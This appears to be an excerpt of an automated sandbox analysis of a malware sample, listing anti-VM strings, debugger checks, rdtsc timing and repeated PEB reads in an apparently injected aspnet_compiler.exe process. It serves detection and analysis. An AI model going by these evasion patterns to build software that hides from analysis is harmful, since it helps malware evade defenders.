Source: wscript.exe, 00000001.00000002.2447923290.000001B5945EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#
Source: temp_executable.exe, 00000002.00000002.2439980184.0000000000882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 3_2_01A5D1C0 rdtsc

3_2_01A5D1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 3_2_00417663 LdrLoadDll,

3_2_00417663

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DA197 mov eax, dword ptr fs:[00000030h]	3_2_019DA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DA197 mov eax, dword ptr fs:[00000030h]	3_2_019DA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DA197 mov eax, dword ptr fs:[00000030h]	3_2_019DA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h]	3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h]	3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h]	3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A911A4 mov eax, dword ptr fs:[00000030h]	3_2_01A911A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9C188 mov eax, dword ptr fs:[00000030h]	3_2_01A9C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9C188 mov eax, dword ptr fs:[00000030h]	3_2_01A9C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A20185 mov eax, dword ptr fs:[00000030h]	3_2_01A20185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FB1B0 mov eax, dword ptr fs:[00000030h]	3_2_019FB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A37190 mov eax, dword ptr fs:[00000030h]	3_2_01A37190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h]	3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h]	3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h]	3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A6019F mov eax, dword ptr fs:[00000030h]	3_2_01A6019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB61E5 mov eax, dword ptr fs:[00000030h]	3_2_01AB61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A051EF mov eax, dword ptr fs:[00000030h]	3_2_01A051EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A101F8 mov eax, dword ptr fs:[00000030h]	3_2_01A101F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB51CB mov eax, dword ptr fs:[00000030h]	3_2_01AB51CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA61C3 mov eax, dword ptr fs:[00000030h]	3_2_01AA61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA61C3 mov eax, dword ptr fs:[00000030h]	3_2_01AA61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1D1D0 mov eax, dword ptr fs:[00000030h]	3_2_01A1D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1D1D0 mov ecx, dword ptr fs:[00000030h]	3_2_01A1D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E51ED mov eax, dword ptr fs:[00000030h]	3_2_019E51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A10124 mov eax, dword ptr fs:[00000030h]	3_2_01A10124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DB136 mov eax, dword ptr fs:[00000030h]	3_2_019DB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DB136 mov eax, dword ptr fs:[00000030h]	3_2_019DB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DB136 mov eax, dword ptr fs:[00000030h]	3_2_019DB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DB136 mov eax, dword ptr fs:[00000030h]	3_2_019DB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1131 mov eax, dword ptr fs:[00000030h]	3_2_019E1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1131 mov eax, dword ptr fs:[00000030h]	3_2_019E1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8A118 mov ecx, dword ptr fs:[00000030h]	3_2_01A8A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8A118 mov eax, dword ptr fs:[00000030h]	3_2_01A8A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8A118 mov eax, dword ptr fs:[00000030h]	3_2_01A8A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8A118 mov eax, dword ptr fs:[00000030h]	3_2_01A8A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA0115 mov eax, dword ptr fs:[00000030h]	3_2_01AA0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E6154 mov eax, dword ptr fs:[00000030h]	3_2_019E6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E6154 mov eax, dword ptr fs:[00000030h]	3_2_019E6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DC156 mov eax, dword ptr fs:[00000030h]	3_2_019DC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E7152 mov eax, dword ptr fs:[00000030h]	3_2_019E7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D9148 mov eax, dword ptr fs:[00000030h]	3_2_019D9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D9148 mov eax, dword ptr fs:[00000030h]	3_2_019D9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D9148 mov eax, dword ptr fs:[00000030h]	3_2_019D9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D9148 mov eax, dword ptr fs:[00000030h]	3_2_019D9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A79179 mov eax, dword ptr fs:[00000030h]	3_2_01A79179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A74144 mov eax, dword ptr fs:[00000030h]	3_2_01A74144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A74144 mov eax, dword ptr fs:[00000030h]	3_2_01A74144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A74144 mov ecx, dword ptr fs:[00000030h]	3_2_01A74144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A74144 mov eax, dword ptr fs:[00000030h]	3_2_01A74144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A74144 mov eax, dword ptr fs:[00000030h]	3_2_01A74144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172 mov eax, dword ptr fs:[00000030h]	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB5152 mov eax, dword ptr fs:[00000030h]	3_2_01AB5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E5096 mov eax, dword ptr fs:[00000030h]	3_2_019E5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DD08D mov eax, dword ptr fs:[00000030h]	3_2_019DD08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA60B8 mov eax, dword ptr fs:[00000030h]	3_2_01AA60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA60B8 mov ecx, dword ptr fs:[00000030h]	3_2_01AA60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E208A mov eax, dword ptr fs:[00000030h]	3_2_019E208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0D090 mov eax, dword ptr fs:[00000030h]	3_2_01A0D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0D090 mov eax, dword ptr fs:[00000030h]	3_2_01A0D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1909C mov eax, dword ptr fs:[00000030h]	3_2_01A1909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A050E4 mov eax, dword ptr fs:[00000030h]	3_2_01A050E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A050E4 mov ecx, dword ptr fs:[00000030h]	3_2_01A050E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A220F0 mov ecx, dword ptr fs:[00000030h]	3_2_01A220F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov ecx, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov ecx, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov ecx, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov ecx, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0 mov eax, dword ptr fs:[00000030h]	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A5D0C0 mov eax, dword ptr fs:[00000030h]	3_2_01A5D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A5D0C0 mov eax, dword ptr fs:[00000030h]	3_2_01A5D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DC0F0 mov eax, dword ptr fs:[00000030h]	3_2_019DC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB50D9 mov eax, dword ptr fs:[00000030h]	3_2_01AB50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E80E9 mov eax, dword ptr fs:[00000030h]	3_2_019E80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A620DE mov eax, dword ptr fs:[00000030h]	3_2_01A620DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A090DB mov eax, dword ptr fs:[00000030h]	3_2_01A090DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DA0E3 mov ecx, dword ptr fs:[00000030h]	3_2_019DA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FE016 mov eax, dword ptr fs:[00000030h]	3_2_019FE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FE016 mov eax, dword ptr fs:[00000030h]	3_2_019FE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FE016 mov eax, dword ptr fs:[00000030h]	3_2_019FE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FE016 mov eax, dword ptr fs:[00000030h]	3_2_019FE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA903E mov eax, dword ptr fs:[00000030h]	3_2_01AA903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA903E mov eax, dword ptr fs:[00000030h]	3_2_01AA903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA903E mov eax, dword ptr fs:[00000030h]	3_2_01AA903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA903E mov eax, dword ptr fs:[00000030h]	3_2_01AA903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DA020 mov eax, dword ptr fs:[00000030h]	3_2_019DA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DC020 mov eax, dword ptr fs:[00000030h]	3_2_019DC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB5060 mov eax, dword ptr fs:[00000030h]	3_2_01AB5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E2050 mov eax, dword ptr fs:[00000030h]	3_2_019E2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0C073 mov eax, dword ptr fs:[00000030h]	3_2_01A0C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A5D070 mov ecx, dword ptr fs:[00000030h]	3_2_01A5D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov ecx, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1070 mov eax, dword ptr fs:[00000030h]	3_2_019F1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0B052 mov eax, dword ptr fs:[00000030h]	3_2_01A0B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8705E mov ebx, dword ptr fs:[00000030h]	3_2_01A8705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8705E mov eax, dword ptr fs:[00000030h]	3_2_01A8705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A133A0 mov eax, dword ptr fs:[00000030h]	3_2_01A133A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A133A0 mov eax, dword ptr fs:[00000030h]	3_2_01A133A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A033A5 mov eax, dword ptr fs:[00000030h]	3_2_01A033A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D8397 mov eax, dword ptr fs:[00000030h]	3_2_019D8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D8397 mov eax, dword ptr fs:[00000030h]	3_2_019D8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D8397 mov eax, dword ptr fs:[00000030h]	3_2_019D8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DE388 mov eax, dword ptr fs:[00000030h]	3_2_019DE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DE388 mov eax, dword ptr fs:[00000030h]	3_2_019DE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DE388 mov eax, dword ptr fs:[00000030h]	3_2_019DE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0438F mov eax, dword ptr fs:[00000030h]	3_2_01A0438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0438F mov eax, dword ptr fs:[00000030h]	3_2_01A0438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB539D mov eax, dword ptr fs:[00000030h]	3_2_01AB539D
